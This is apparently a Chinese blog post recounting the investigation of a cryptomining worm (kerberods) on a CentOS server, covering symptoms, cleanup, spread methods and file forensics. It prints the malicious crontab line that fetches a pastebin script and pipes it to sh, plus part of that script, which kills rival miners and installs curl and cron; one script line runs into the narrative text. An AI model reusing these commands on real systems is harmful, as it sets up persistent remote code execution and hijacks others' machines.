参考文档
https://www.freebuf.com/articles/web/94237.html
https://www.4hou.com/vulnerable/13843.html
https://laucyun.com/17e194c26e4554cab975aae760bad553.html
现象
服务器CPU飙升
故障时间2019.4.10 17:50
top及htop查看信息只能看到1个cpu信息,默认是4个
排错
排查发现crontab异常
[root@VM_3_114_centos ~]# crontab -l
*/15 * * * * (curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh先简单解决问题
重命名curl wget yum等工具,然后停止cron服务,删除crontab任务并禁锢cron任务中root文件,并修改host伪造pastebin.com解析,问题暂时得到了解决
然后分析问题
手工试了下这个脚本的威力,具体的也可以访问这个网站查看 https://pastebin.com/raw/xmxHzu5P ,这里会***启动文件/usr/sbin/kerberods
后来网上查了下该病毒短时间内即造成大量 Linux 主机沦陷,它的传播方式分为三种,分别是:
- 从 known_hosts 文件读取 IP 列表,用于登录信任该主机的其他主机,并控制它们执行恶意命令
- 利用 Redis 未授权访问和弱密码这两种常见的配置问题进行控制它们执行恶意命令
- 利用 SSH 弱密码进行爆破,然后控制它们执行恶意命令
[root@VM_3_114_centos tmp]# wgetold -q -O- https://pastebin.com/raw/xmxHzu5P
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
mkdir -p /tmp
chmod 1777 /tmp
rm -rf /tmp/go.sh
rm -rf /tmp/go2.sh
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9
ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=80.0) print $2}'|xargs kill -9
apt-get install curl -y||yum install curl -y||apk add curl -y
apt-get install cron -y||yum install crontabs -y||apk add cron -y
systemctl start crond
systemctl start cron
systemctl start crontab
service 查找当时哪些文件被修改了
[root@VM_3_114_centos / ]#find ./ -mtime -1 -type f -exec ls -lt {} \; | grep "17:50"
-rw-r--r-- 1 root root 9216 Apr 10 17:50 ./etc/pki/nssdb/cert9.dbold
-rw-r--r-- 1 root root 11264 Apr 10 17:50 ./etc/pki/nssdb/key4.dbold
-rw-r--r-- 1 root root 35773 Apr 10 17:50 ./etc/ld.so.cache
-rw-r--r-- 1 root root 35773 Apr 10 17:50 ./etc/crond.d/tomcat
...
发现问题文件
发现一个比较可疑的文件,文件当时没用删除是二进程形式,通过xxd能查看,大概如下内容,比较奇怪的是redis格式的,而且还有redis版本,后来谷歌发现redis无密码确实有被利用的风险
[root@VM_3_114_centos / ]#cat /etc/crond.d/tomcat
REDIS 0008%09 redis-ver4.0.6 redis-bits